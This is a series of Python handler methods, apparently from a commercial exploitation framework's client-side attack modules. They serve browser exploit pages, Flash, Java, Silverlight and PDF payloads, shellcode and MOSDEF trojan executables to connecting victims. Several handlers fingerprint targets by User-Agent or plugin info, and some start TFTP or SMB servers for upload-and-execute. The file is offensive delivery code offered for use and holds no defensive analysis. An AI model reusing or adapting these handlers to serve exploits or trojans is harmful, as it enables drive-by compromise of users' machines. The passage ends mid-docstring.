def makesploit(self, clientheader, clientbody):
    """Build the response for one browser request (ClientD entry point).

    Every clientside module exposes this method; ClientD calls it with the
    parsed request header and body and sends whatever it returns back to
    the connecting browser.

    Args:
        clientheader: parsed request header; only ``getStrValue`` is used,
            to read the User-Agent.
        clientbody: request body (not inspected by this module).

    Returns:
        A ``(header, body)`` pair.  A User-Agent containing "firefox" gets a
        static HTML page with no Content-Type set; anything else gets a
        302 to http://www.google.com typed as ``text/html``.
    """
    resp = spkproxy.header('SERVER')
    payload = spkproxy.body()

    # The only request attribute inspected is the User-Agent, a value the
    # client controls entirely; it is logged and substring-matched.
    ua = clientheader.getStrValue(['User-Agent'])
    self.log("[+] User agent of connecting host: %s" % ua)

    is_firefox = 'firefox' in ua.lower()
    if not is_firefox:
        self.log("[+] Redirect to Google")
        resp.status = '302'
        resp.addHeader('Location', 'http://www.google.com')
        resp.addHeader('Content-Type', 'text/html')
        return resp, payload

    self.log("[+] Sending HTML")
    payload.setBody("""
<html>
<head>
</head>
<body>
<center><h1>Firefox detected!</h1></center>
</body></html>
""")
    return resp, payload
def makesploit(self, clientheader, clientbody):
    """Serve the HTML loader, the JS helper or the SWF, keyed on the URL.

    Dispatch is a substring match (``str.count``) of ``self.htmlfilename``,
    ``self.jsfilename`` and ``self.swffilename`` against
    ``clientheader.URL``, so any URL containing the name matches.  Unknown
    URLs get a 302 back to the HTML file.

    Returns:
        ``(header, body)`` for the chosen resource.
    """
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()
    url = clientheader.URL
    self.log('Requested URL: %s' % url)

    if url.count(self.htmlfilename):
        self.log('Serving HTML file')
        self.createShellcode()
        payload.setBody(self.makeHTML())
        resp.addHeader('Content-Type', 'text/html')
    elif url.count(self.jsfilename):
        self.log('Serving JS file')
        payload.setBody(self.makeJS())
        resp.addHeader('Content-Type', 'text/javascript')
    elif url.count(self.swffilename):
        # The x-flash-version header is client supplied; commas are turned
        # into dots so it compares against column 1 of the ``targets``
        # table (defined outside this method).
        flash_version = clientheader.getStrValue(['x-flash-version']).replace(',', '.')
        # First matching row wins; no match leaves self.clientversion as it was.
        for idx, entry in enumerate(targets):
            if flash_version == entry[1]:
                self.clientversion = idx
                break
        self.log('Serving SWF file for Adobe Flash Player v%s' % (flash_version))
        payload.setBody(self.makeSWF())
        resp.addHeader('Content-Type', 'application/x-shockwave-flash')
    else:
        self.log('redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.htmlfilename)

    return resp, payload
def makesploit(self,clientheader,clientbody):
    """Construct the attack response; IE-only by User-Agent.

    Returns ``(None, None)`` (no response) when the User-Agent does not
    contain "MSIE" or when ``self.makefile()`` yields nothing; otherwise
    the HTML from ``makefile`` is the body.  No Content-Type is set.
    """
    from libs.spkproxy import header, body
    resp = header("SERVER")
    payload = body()

    ua = clientheader.getStrValue(["User-Agent"])
    self.log("User agent of connecting host: %s" % ua)
    # Plain substring test: a spoofed User-Agent passes it.
    if "MSIE" not in ua:
        self.log("Non IE browser connected - returning None")
        return None,None

    self.log("Sending the Speech attack html file")
    content = self.makefile()
    if not content:
        return None,None
    payload.setBody(content)
    return resp,payload
def makesploit(self, clientheader, clientbody):
    """Dispatch on the URL: HTML loader, JS helper, SWF, or redirect.

    The SWF branch maps the client-supplied ``x-flash-version`` header onto
    an index into the ``targets`` table (defined outside this method) and
    answers 404 when ``self.clientversion`` is still 0 afterwards.  Served
    files carry no Content-Type; the redirect is typed
    ``binary/octet-stream``.

    Returns:
        ``(header, body)``.
    """
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()
    url = clientheader.URL

    if url.count(self.htmlfilename):
        self.log('Serving HTML file')
        payload.setBody(self.makeHTML())
    elif url.count(self.jsfilename):
        self.log('Serving JS file')
        payload.setBody(self.makeJS())
    elif url.count(self.swffilename):
        flash_version = clientheader.getStrValue(['x-flash-version']).replace(',', '.')
        for idx, entry in enumerate(targets):
            if flash_version == entry[1]:
                self.clientversion = idx
                break
        # NOTE: index 0 doubles as "no match", so a client that genuinely
        # matches row 0 of ``targets`` is reported as unknown here.
        if self.clientversion == 0:
            self.log('Unknown Adobe Flash Player v%s' % (flash_version))
            resp.status = '404'
            return resp, payload
        self.log('Serving SWF file for Adobe Flash Player v%s' % (flash_version))
        self.createShellcode()
        payload.setBody(self.makeSWF())
    else:
        self.log('redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.htmlfilename)
        resp.addHeader('Content-Type', 'binary/octet-stream')

    return resp, payload
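def makesploit(self, clientheader, clientbody):
    """Serve the exploit file or the generated MOSDEF trojan, else redirect.

    URL dispatch is a substring match.  The trojan is written to disk by
    ``self.maketrojan()``, read back and deleted once read.  The read now
    happens inside a ``with`` block so the handle is released even when
    ``read()`` raises (the original left it open on that path).

    Returns:
        ``(header, body)``.  The exploit file carries no Content-Type; the
        trojan is ``binary/octet-stream`` with ``Connection: close``; the
        redirect is typed ``binary/octet-stream``.
    """
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()
    url = clientheader.URL

    if url.count(self.filename):
        payload.setBody(self.makefile())
    elif url.count(self.trojanname):
        self.maketrojan()
        self.log("Sending MOSDEF trojan")
        # The on-disk artefact only exists between maketrojan() and here.
        with open(self.trojanname, "rb") as fh:
            sploitstring = fh.read()
        os.remove(self.trojanname)
        self.log("Sending %d bytes" % len(sploitstring))
        resp.addHeader("Content-type", "binary/octet-stream")
        resp.addHeader("Connection", "close")
        payload.setBody(sploitstring)
    else:
        self.log('Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'binary/octet-stream')

    return resp, payload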
def makesploit(self,clientheader,clientbody):
    """Construct the attack; requires an "MSIE" User-Agent on Windows NT.

    The Windows version token following "windows nt " in the lowercased
    User-Agent is handed to ``self.makefile``.  Returns ``(None, None)``
    for non-IE or non-NT agents, or when makefile yields nothing.
    """
    from libs.spkproxy import header, body
    resp = header("SERVER")
    payload = body()

    ua = clientheader.getStrValue(["User-Agent"])
    self.log("User agent of connecting host: %s" % ua)
    if "MSIE" not in ua:
        # Substring test only; a spoofed User-Agent passes.
        self.log("Non IE browser connected - returning None")
        return None,None

    lowered = ua.lower()
    if "windows nt" not in lowered:
        # Every supported version is NT based.
        return None,None

    # Text between "windows nt " and the next ";" or ")", e.g. "6.1".
    # Like the original, this raises IndexError if "windows nt" is present
    # without a trailing space.
    after_nt = lowered.split("windows nt ")[1]
    windowsver = after_nt.split(";")[0].split(")")[0]

    self.log("Sending the GOMPlayer attack html file")
    content = self.makefile(windowsver)
    if not content:
        return None,None
    payload.setBody(content)
    return resp,payload
def makesploit(self, clientheader, clientbody):
    """Serve the XAP or the HTML loader, gated on a Windows User-Agent.

    With no plugin inventory available the only filter is the User-Agent:
    anything not containing "windows" is declined with ``(None, None)``;
    "win64" selects the 64-bit shellcode build.  The request URL then picks
    the resource, defaulting to a 302 back to ``self.filename``.
    """
    resp = header('SERVER')
    payload = body()

    # The User-Agent is client controlled; it is the only signal here.
    ua_lower = clientheader.getStrValue(['User-Agent']).lower()
    if "windows" not in ua_lower:
        self.log_error("Bailing on this client as it is not likely to be vulnerable")
        return None, None
    self.createShellcode('win64' in ua_lower)

    url = clientheader.URL
    if self.xapfilename in url:
        self.log_info('Serving XAP file')
        payload.setBody(self.makeXAP())
        resp.addHeader('Content-Type', 'application/x-silverlight-app')
    elif self.filename in url:
        self.log_info('Serving HTML file')
        payload.setBody(self.makefile())
        resp.addHeader('Content-Type', 'text/html')
    else:
        self.log_info('Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')
    return resp, payload
def makesploit(self, clientheader, clientbody):
    """ClientD entry point: serve the exploit HTML or redirect to it.

    Shellcode is regenerated on every request before anything else.
    ``wp_browserinfo`` turns the User-Agent into a (browser, osversion)
    pair that parameterises ``self.makefile``.  The HTML response carries
    ``Set-Cookie: SessionID=<n>`` where ``n`` is the JS obfuscator's XOR
    key, i.e. the key is sent in the clear alongside the content.
    """
    self.createShellcode()
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    self.log('WP> ****************************************')
    url = clientheader.URL
    self.log("WP> URL Received: %s" % url)
    ua = clientheader.getStrValue(['User-Agent'])
    # Read but not used by this handler.
    cookies = clientheader.getStrValue(['Cookie'])

    browser, osversion = wp_browserinfo(ua)
    for line in ('WP> OSVersion: %s' % osversion,
                 'WP> Browser: %s' % browser,
                 'WP> '):
        self.log(line)

    if not url.count(self.filename):
        self.log('WP> Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')
        return resp, payload

    data = self.makefile(browser, osversion)
    if not data:
        return None, None
    payload.setBody(data)
    resp.addHeader('Content-Type', 'text/html')
    resp.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey())
    return resp, payload
def makesploit(self, clientheader, clientbody):
    """ClientD entry point: serve the exploit file for ``self.filename``.

    Shellcode is regenerated on every request.  Any other URL is answered
    with a 302 back to ``self.filename``.  The served response carries
    ``Set-Cookie: SessionID=<n>`` where ``n`` is the JS obfuscator's XOR
    key, so the key is visible to anyone who can see the response.
    """
    self.createShellcode()
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    url = clientheader.URL
    self.log("WP> URL Received: %s" % url)
    ua = clientheader.getStrValue(['User-Agent'])
    self.log('WP> User agent of connecting host: %s' % ua)

    if not url.count(self.filename):
        self.log('WP> Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')
        return resp, payload

    self.log('WP> Serving exploit file')
    data = self.makefile()
    if not data:
        return None, None
    payload.setBody(data)
    resp.addHeader('Content-Type', 'text/html')
    resp.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey())
    return resp, payload
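def makesploit(self, clientheader, clientbody):
    """Construct the attack: serve the bundled JAR or the generated ODB.

    A URL containing ".jar" serves ``Resources/javanode.jar`` (relative to
    the current working directory); the file is now read inside a ``with``
    block so the handle is always closed.  A URL containing ".odb" serves
    ``self.makefile()``.  Both set ``self.mimetype`` as a side effect, but
    no Content-Type header is emitted from it here - only
    ``Connection: close``.  Anything else is a 302 to ``self.filename``.

    Returns:
        ``(header, body)``.
    """
    from libs.spkproxy import header, body
    resp = header("SERVER")
    payload = body()

    ua = clientheader.getStrValue(["User-Agent"])
    self.log("User agent of connecting host: %s" % ua)

    url = clientheader.URL
    if ".jar" in url:
        with open(os.path.join("Resources", "javanode.jar"), "rb") as fh:
            sploitstring = fh.read()
        self.mimetype = "application/octet-stream"
    elif ".odb" in url:
        sploitstring = self.makefile()
        self.mimetype = "application/vnd.oasis.opendocument.database"
    else:
        self.log("redirecting to self")
        resp.status = "302"
        resp.addHeader("Location", self.filename)
        resp.addHeader("Content-Type", "text/html")
        return resp, payload

    self.log("Sending %d bytes" % len(sploitstring))
    resp.addHeader("Connection", "close")
    payload.setBody(sploitstring)
    return resp, payload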
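def makesploit(self, clientheader, clientbody):
    """
    For use by exploits/httpserver/httpserver.py -O singleexploit:upload -O destfilename:testvuln

    Every request is answered with the output of ``self.makedownloadfile()``,
    typed ``Content-type: self.datatype`` with ``Connection: close``.  The
    original wrapped this in ``if 1:`` with an unreachable redirect-to-self
    branch; the dead branch is dropped here and behaviour is unchanged.

    Returns:
        ``(header, body)``.
    """
    from libs.spkproxy import header, body
    resp = header("SERVER")
    payload = body()

    ua = clientheader.getStrValue(["User-Agent"])
    self.log("User agent of connecting host: %s" % ua)

    self.log("Sending the trojan exe file")
    sploitstring = self.makedownloadfile()
    self.log("Sending %d bytes" % len(sploitstring))
    resp.addHeader("Content-type", self.datatype)
    resp.addHeader("Connection", "close")
    payload.setBody(sploitstring)
    return resp, payload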
def makesploit(self, clientheader, clientbody):
    """Gate the client on vulnerability, then dispatch on the request URL.

    Gate: with ``self.plugin_info`` present, ``self.is_vulnerable`` decides;
    without it, any User-Agent containing "windows" is accepted.  A refused
    client gets ``(None, None)``; an accepted one has shellcode built.
    Routes: ``self.filename`` -> HTML, ``self.swffilename`` -> SWF, any URL
    containing "code" -> ``self.shellcode`` zlib-compressed and passed
    through ``self.xorer.encrypt``; anything else is a 302 to the HTML.
    """
    self.nlog("\n---------------\nmakesploit - URL = %s\n---------------\n" % clientheader.URL)
    resp = header('SERVER')
    payload = body()

    bail_msg = "Bailing on this client as it is not likely to be vulnerable"
    if self.plugin_info:
        self.log_info("We got a plugin info for this target - thanks clientd!")
        if not self.is_vulnerable(self.plugin_info):
            self.log_error(bail_msg)
            return None, None
        self.log_info("This client is most likely vulnerable")
    else:
        # No plugin inventory: fall back to the client-controlled User-Agent.
        useragent = clientheader.getStrValue(['User-Agent'])
        self.log("User-Agent = %s" % useragent)
        if "windows" not in useragent.lower():
            self.log_error(bail_msg)
            return None, None
        self.log_info("This client is likely to be vulnerable")
    self.createShellcode()

    url = clientheader.URL
    self.nlog(url)
    if url.count(self.filename):
        self.nlog('Serving HTML file')
        payload.setBody(self.makefile())
        resp.addHeader('Content-Type', 'text/html')
    elif url.count(self.swffilename):
        self.nlog('Serving SWF file')
        payload.setBody(self.makeSWF())
        resp.addHeader('Content-Type', 'application/x-shockwave-flash')
        self.nlog('Served SWF file')
    elif url.count("code"):
        self.nlog("serving shellcode")
        resp.addHeader('Content-Type', 'application/octet-stream')
        # Compressed, then run through the module's XOR helper.
        payload.setBody(self.xorer.encrypt(zlib.compress(self.shellcode)))
    else:
        self.nlog('Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')
    return resp, payload
def makesploit(self,clientheader,clientbody):
    """Serve the HTML page or its CSS companion, else redirect to the HTML.

    When ClientD supplied ``self.plugin_info`` it is run through
    ``self.is_vulnerable``; a negative verdict returns ``(None, None)``.
    Without plugin info no filtering happens at all.
    """
    from libs.spkproxy import header,body
    resp = header('SERVER')
    payload = body()

    if self.plugin_info:
        self.log("We got a plugin info for this target - thanks clientd!")
        if not self.is_vulnerable(self.plugin_info):
            self.log("Bailing on this client as it is not likely to be vulnerable.")
            return None, None
        self.log("This client is most likely vulnerable!")

    url = clientheader.URL
    if url.count(self.filename):
        self.log('Serving HTML file')
        payload.setBody(self.makefile())
        resp.addHeader('Content-Type','text/html')
    elif url.count(self.cssfile):
        self.log('Serving CSS file')
        payload.setBody(self.make_css())
        resp.addHeader('Content-Type','text/css')
    else:
        self.log('redirecting to self')
        resp.status = '302'
        resp.addHeader('Location',self.filename)
        resp.addHeader('Content-Type','text/html')
    return resp,payload
def makesploit(self, clientheader, clientbody):
    """Serve the exploit HTML for ``self.filename`` or redirect to it.

    With ClientD plugin info present, ``self.is_vulnerable`` returning 0
    declines the client with ``(None, None)``.  The page comes from
    ``self.makefile(request_header=clientheader)`` after the shellcode is
    rebuilt; a ``Set-Cookie: SessionID=<n>`` with the JS obfuscator's XOR
    key accompanies it.  A failed page build also returns ``(None, None)``.
    """
    from libs.spkproxy import header, body
    # Named so the imported factories are not shadowed by their results.
    resp = header('SERVER')
    payload = body()

    if self.plugin_info and self.is_vulnerable(self.plugin_info) == 0:
        self.log('Bailing on this client as it is not likely to be vulnerable')
        return None, None

    if not clientheader.URL.count(self.filename):
        self.log('%s: Redirecting to self' % self.name)
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')
        return resp, payload

    self.log('%s: Serving HTML file' % self.name)
    self.createShellcode()
    html = self.makefile(request_header=clientheader)
    if not html:
        self.log("%s: Error creating HTML for this exploit" % self.name)
        return None, None
    payload.setBody(html)
    resp.addHeader('Content-Type', 'text/html')
    resp.addHeader('Set-Cookie', 'SessionID=%d' % (self.jsObfuscator.getXORKey()))
    return resp, payload
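def makesploit(self, clientheader, clientbody):
    """Serve the HTML loader or the prepared PDF; first call also starts TFTP.

    ``self.test()`` runs on every request.  When ``self.startTFTP`` is 1 a
    thread running ``self.upload_and_execute`` is started, the flag is
    cleared and the handler sleeps 3 seconds before answering.  The PDF at
    ``self.dest_pdf`` is read inside a ``with`` block (the original used an
    unclosed ``file(...)``, a builtin that no longer exists on Python 3).

    Returns:
        ``(header, body)``; unknown URLs get a 302 to ``self.htmlfilename``.
    """
    self.test()
    # The flag is read and cleared without a lock; two concurrent first
    # requests could both start the thread.
    if self.startTFTP == 1:
        worker = Thread(target=self.upload_and_execute)
        worker.start()
        self.startTFTP = 0
        time.sleep(3)

    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()
    url = clientheader.URL

    if url.count(self.htmlfilename):
        self.log('Serving HTML file')
        payload.setBody(self.makeHTML())
        resp.addHeader('Content-Type', 'text/html')
    elif url.count(self.dest_pdf):
        self.log('Serving PDF file')
        resp.addHeader('Content-Type', 'application/pdf')
        with open(self.dest_pdf, 'rb') as fh:
            payload.setBody(fh.read())
    else:
        self.log('redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.htmlfilename)
        resp.addHeader('Content-Type', 'text/html')
    return resp, payload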
def makesploit(self, clientheader, clientbody):
    """Serve the HTML loader, the SWF, the staged payload, or give up.

    Order matters here: the URI is encoded and ``self.setTarget`` is fed
    the raw User-Agent before the plugin-info gate runs.  With plugin info
    present a negative ``self.is_vulnerable`` verdict returns
    ``(None, None)``.  The SWF is only served when the URL contains
    "<swfName>?cat=<encodedURI>"; the payload branch builds
    ``self.stage1`` from the client's x-flash-version header and prepends
    it to freshly encoded shellcode.  A URL containing "exit" ends the
    attempt with a 302 to google.com.  Unmatched URLs are NOT redirected
    (see the comment in the final branch) - the loader is served directly.
    """
    h=header('SERVER')
    b=body()
    encodedURI = self.encodeURI()
    ua = clientheader.getHeaderValue('User-Agent')
    # Python 2 print statement: the User-Agent goes to stdout, not self.log.
    print ua
    self.setTarget(ua)
    if self.plugin_info:
        info_dict=self.plugin_info
        self.log("We got a plugin info for this target - thanks clientd!")
        if self.is_vulnerable(info_dict):
            self.log("This client is most likely vulnerable!")
        else:
            self.log("Bailing on this client as it is not likely to be vulnerable.")
            return None, None
    # serve the html loader
    if clientheader.URL.count(self.filename):
        self.log('Serving HTML file')
        self.createShellcode()
        sploitstring = self.generateHtml(ua, encodedURI)
        b.setBody(sploitstring)
        h.addHeader('Content-Type','text/html')
    # serve the swf exploit (URL must carry the encoded URI as ?cat=)
    elif clientheader.URL.count("%s?cat=%s" % (self.swfName, encodedURI)):
        self.log('Serving SWF')
        b.setBody(self.makeSWF())
        h.addHeader('Content-Type','application/x-shockwave-flash')
    # serve the mosdef
    elif clientheader.URL.count(self.payloadName):
        # x-flash-version is client supplied and selects the stage-one code.
        fversion = clientheader.getHeaderValue('x-flash-version')
        # Re-read here; the value is the same header already read above.
        ua = clientheader.getHeaderValue('User-Agent')
        self.log('Serving Payload')
        self.stage1 = self.generateStageOneCode(fversion)
        self.createAndEncodeShellcode()
        # Body is stage1 followed by self.shellcode, typed as text/html.
        b.setBody(self.stage1 + self.shellcode)
        h.addHeader('Content-Type','text/html')
    elif clientheader.URL.count("exit"):
        self.log('Max retries reached. Exploit failed. Not vulnerable?')
        h.status='302'
        h.addHeader('Location',"http://www.google.com")
        h.addHeader('Content-Type','text/html')
        return h,b
    else:
        # basically, if we redirect the target on
        # the first request we are doomed. So instead
        # we just send them the HTML loader straight away
        self.log('Serving HTML file (via the redirect)')
        self.createShellcode()
        sploitstring = self.generateHtml(ua, encodedURI)
        b.setBody(sploitstring)
        h.addHeader('Content-Type','text/html')
    return h,b
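def makesploit(self, clientheader, clientbody):
    """Serve the JNLP, the bundled JAR, or the Windows MOSDEF trojan.

    The client's Cookie header is stored in ``self.CANSessID`` (the full
    "CANSessID=..." string) and logged when it looks like one.  The trojan
    is rebuilt by ``self.maketrojan()`` on every request, whichever branch
    runs.  File reads now use ``with`` so handles are released even if
    ``read()`` raises (the original left them open on that path).  The JAR
    is read from ``<cwd>/3rdparty/D2SEC/exploits/d2sec_jnlp/``; the trojan
    file is deleted once read.  Unknown URLs get a 302 to the JNLP.

    Returns:
        ``(header, body)``.
    """
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    ua = clientheader.getStrValue(['User-Agent'])
    # Full "CANSessID=..." cookie string exactly as the client sent it.
    self.CANSessID = clientheader.getStrValue(['Cookie'])
    if (self.CANSessID and self.CANSessID not in ['0']
            and self.CANSessID.count('CANSessID')):
        self.log("Scavenged original CANSessID from client [%s]" % self.CANSessID)
    self.log("User agent of connecting host: %s" % ua)

    self.maketrojan()
    path = os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_jnlp/"
    url = clientheader.URL

    if url.count(self.jnlpfile):
        self.log("Sending JNLP file: %s" % (self.jnlpfile))
        resp.addHeader('Content-Type', 'application/x-java-jnlp-file')
        payload.setBody(self.makefile())
    elif url.count(self.jarfile):
        self.log("Sending JAR file")
        with open(path + self.jarfile, "rb") as fh:
            sploitstring = fh.read()
        self.log("Sending %d bytes" % len(sploitstring))
        resp.addHeader("Content-type", "binary/octet-stream")
        resp.addHeader("Connection", "close")
        payload.setBody(sploitstring)
    elif url.count(self.trojannamew):
        self.log("Sending MOSDEF trojan")
        with open(self.trojannamew, "rb") as fh:
            sploitstring = fh.read()
        # The artefact only exists between maketrojan() and here.
        os.remove(self.trojannamew)
        self.log("Sending %d bytes" % len(sploitstring))
        resp.addHeader("Content-type", "binary/octet-stream")
        resp.addHeader("Connection", "close")
        payload.setBody(sploitstring)
    else:
        self.log('Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.jnlpfile)
        resp.addHeader('Content-Type', 'binary/octet-stream')
    return resp, payload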
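def makesploit(self, clientheader, clientbody):
    """Serve the page, a Windows/Linux MOSDEF trojan, or the Firefox XPI.

    Both trojans are rebuilt on every request before dispatch.  Trojans and
    the XPI are read back from disk and deleted once read; reads now use
    ``with`` so handles are released even if ``read()`` raises (the
    original left them open), and the XPI path is computed once rather
    than calling ``os.getcwd()`` twice.  Unknown URLs get a 302 to
    ``self.filename``.

    Returns:
        ``(header, body)``.
    """
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    self.maketrojan_win()
    self.maketrojan_linux()
    url = clientheader.URL

    def _read_then_remove(filepath):
        # Generated artefacts only need to exist for this one response.
        with open(filepath, "rb") as fh:
            content = fh.read()
        os.remove(filepath)
        return content

    if url.count(self.filename):
        payload.setBody(self.makefile())
    elif url.count(self.trojannamewin):
        self.log("Sending MOSDEF trojan")
        sploitstring = _read_then_remove(self.trojannamewin)
        self.log("Sending %d bytes" % len(sploitstring))
        resp.addHeader("Content-type", "binary/octet-stream")
        resp.addHeader("Connection", "close")
        payload.setBody(sploitstring)
    elif url.count(self.trojannamelinux):
        self.log("Sending MOSDEF trojan")
        sploitstring = _read_then_remove(self.trojannamelinux)
        self.log("Sending %d bytes" % len(sploitstring))
        resp.addHeader("Content-type", "binary/octet-stream")
        resp.addHeader("Connection", "close")
        payload.setBody(sploitstring)
    elif url.count(self.xpiname):
        self.log("Creating XPI file")
        self.makexpi()
        self.log("Sending XPI file")
        xpi_path = os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_ffmosdef/" + self.xpiname
        sploitstring = _read_then_remove(xpi_path)
        self.log("Sending %d bytes" % len(sploitstring))
        resp.addHeader("Content-type", "application/x-xpinstall")
        resp.addHeader("Connection", "close")
        payload.setBody(sploitstring)
    else:
        self.log("Redirecting to self")
        resp.status = "302"
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'binary/octet-stream')
    return resp, payload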
def resp_207(self, content_body):
    """Build a 207 Multi-Status response carrying *content_body*.

    The Content-Type is ``text/xml; charset="utf8"`` exactly as in the
    original (the IANA-registered charset name is "UTF-8").

    Returns:
        ``(header, body)``.
    """
    resp = header("SERVER")
    payload = body()
    resp.status, resp.msg = "207", "Multi-Status"
    resp.addHeader("Content-Type", 'text/xml; charset="utf8"')
    payload.setBody(content_body)
    return resp, payload
def resp_403(self):
    """Return an empty-bodied ``403 Forbidden`` ``(header, body)`` pair."""
    resp = header("SERVER")
    payload = body()
    resp.status, resp.msg = "403", "Forbidden"
    resp.addHeader("Content-Type", "text/html")
    payload.setBody("")
    return resp, payload
def resp_404(self):
    """Return an empty-bodied ``404 Not Found`` ``(header, body)`` pair."""
    resp = header("SERVER")
    payload = body()
    resp.status, resp.msg = "404", "Not Found"
    resp.addHeader("Content-Type", "text/html")
    payload.setBody("")
    return resp, payload
def makesploit(self, clientheader, clientbody):
    """Construct the attack: gate on plugin info, ensure TFTPD, then dispatch.

    With ``self.plugin_info`` present ``self.is_vulnerable`` decides and a
    refusal returns ``(None, None)``; without it the client is assumed
    vulnerable.  ``self.baseurl`` is refreshed from the session loader.  A
    TFTP server is started once (kept in ``self.tftpd``) with
    ``check_tftpd`` on a thread; failing to start it also returns
    ``(None, None)``.  The URL then selects the first stage, the asx, the
    downexec or the icon - none of which sets a Content-Type - and
    anything else is a 302 to ``self.filename``.
    """
    from libs.spkproxy import header, body
    resp = header("SERVER")
    payload = body()

    if not self.plugin_info:
        self.log("Assuming vulnerable - no plugin info found!")
    else:
        self.log("We got a plugin info for this target - thanks clientd!")
        if not self.is_vulnerable(self.plugin_info):
            self.log("Bailing on this client as it is not likely to be vulnerable (%s)"
                     % self.plugin_info.get("language"))
            return None, None
        self.log("This client is most likely vulnerable!")

    self.baseurl = self.sessionstate.loader.canvasobj.getBaseURL()

    if not self.tftpd:
        self.tftpd = self.set_up_tftp_server()
        if self.tftpd:
            self.log("Starting TFTPD thread")
            Thread(target=self.check_tftpd).start()
        else:
            self.log("Could not start TFTPD, going to next exploit!")
            return None, None

    url = clientheader.URL
    # Checked in order; the first substring match wins.
    routes = (
        (self.filename, "Serving first stage", self.makefile),
        (self.fileasx, "Serving asx", self.makeasx),
        (self.downexec, "Serving downexec", self.makedownexec),
        (self.icon, "Serving icon", lambda: self.icondata),
    )
    for needle, message, produce in routes:
        if url.count(needle):
            self.log(message)
            payload.setBody(produce())
            break
    else:
        self.log('redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')
    return resp, payload
def makesploit(self,clientheader,clientbody):
    """Construct the attack: serve the HTML after standing up TFTP and SMB.

    Each unmet requirement returns ``(None, None)``: an "MSIE" User-Agent
    and a configured ``self.callback`` whose ``ip`` becomes ``self.bindip``.
    Options are read from ``self.clientsideargs`` (HTTPMOSDEF,
    useSSLMOSDEF and the user_supplied_args message / title /
    infiniteloop); without that attribute a ``NameError`` is raised
    because the module must run under httpserver.  The TFTP and SMB
    servers are started on separate threads just before the page is
    returned; no Content-Type is set on it.
    """
    from libs.spkproxy import header, body
    resp = header("SERVER")
    payload = body()

    ua = clientheader.getStrValue(["User-Agent"])
    self.log("User agent of connecting host: %s" % ua)
    if "MSIE" not in ua:
        # Substring test only; a spoofed User-Agent passes.
        self.log("Non IE browser connected - returning None")
        return None,None

    if not self.callback:
        self.log("Could not figure out callback or bindip - please set bindip to a real IP!")
        return None, None
    self.log("Using callback.ip for bindip: %s" % self.callback.ip)
    self.bindip = self.callback.ip

    if not hasattr(self, "clientsideargs"):
        raise NameError("Can not load options, must be run from httpserver")
    self.HTTP = self.clientsideargs["HTTPMOSDEF"]
    self.SSL = self.clientsideargs["useSSLMOSDEF"]
    user_args = self.clientsideargs["user_supplied_args"]
    for arg in user_args:
        value = user_args[arg]
        if arg == "message":
            self.message = value
        elif arg == "title":
            self.title = value
        elif arg == "infiniteloop":
            # Only the literal strings "True"/"true" enable it.
            self.infiniteloop = value in ["True","true"]
        # Any other key is silently ignored.

    for server in (self.set_up_tftp_server, self.set_up_smb_server):
        Thread(target=server).start()

    self.log("Serving evil html")
    payload.setBody(self.makefile())
    return resp,payload
def makesploit(self, clientheader, clientbody):
    """ClientD entry point: serve the exploit HTML or a generated .NET DLL.

    ``wp_browserinfo`` derives (browser, osversion) from the User-Agent.
    A URL containing ".dll" gets a PE built by ``PElib``: for "MSIE 7.0"
    the buffer embeds freshly created shellcode with ``self.vProtect``
    switched on for the duration of that call, otherwise an empty string
    is embedded.  Other URLs get a 302 to ``self.filename``.  An empty
    page or PE buffer returns ``(None, None)`` and skips the closing
    banner log line.
    """
    self.createShellcode()
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    banner = 'WP> ****************************************'
    self.log(banner)
    url = clientheader.URL
    self.log("WP> URL Received: %s" % url)
    ua = clientheader.getStrValue(['User-Agent'])
    browser, osversion = wp_browserinfo(ua)
    self.log('WP> OSVersion: %s' % osversion)
    self.log('WP> Browser: %s' % browser)
    self.log('WP> ')

    if url.count(self.filename):
        self.log('WP> Serving exploit html file')
        data = self.makefile(browser, osversion)
        if not data:
            return None, None
        payload.setBody(data)
        resp.addHeader('Content-Type', 'text/html')
        resp.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey())
    elif url.count('.dll'):
        if browser == "MSIE 7.0":
            self.log('WP> Serving IE7 .Net DLL file')
            self.vProtect = True  # Needed for this type of payload
            pe_builder = PElib()
            data = pe_builder.createDotNETPEFileBuf(self.createShellcode(), self.pc)
            self.vProtect = False  # Reset this
        else:
            self.log('WP> Serving IE8 .Net DLL file')
            pe_builder = PElib()
            data = pe_builder.createDotNETPEFileBuf("", self.pc)
        if not data:
            return None, None
        payload.setBody(data)
        resp.addHeader('Content-Type', 'application/octet-stream')
    else:
        self.log('WP> Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')

    self.log(banner)
    return resp, payload
def makesploit(self, clientheader, clientbody):
    """Serve the HTML page (with a precomputed address list), the CSS, or bail.

    With ``self.plugin_info`` present ``self.is_vulnerable`` decides and a
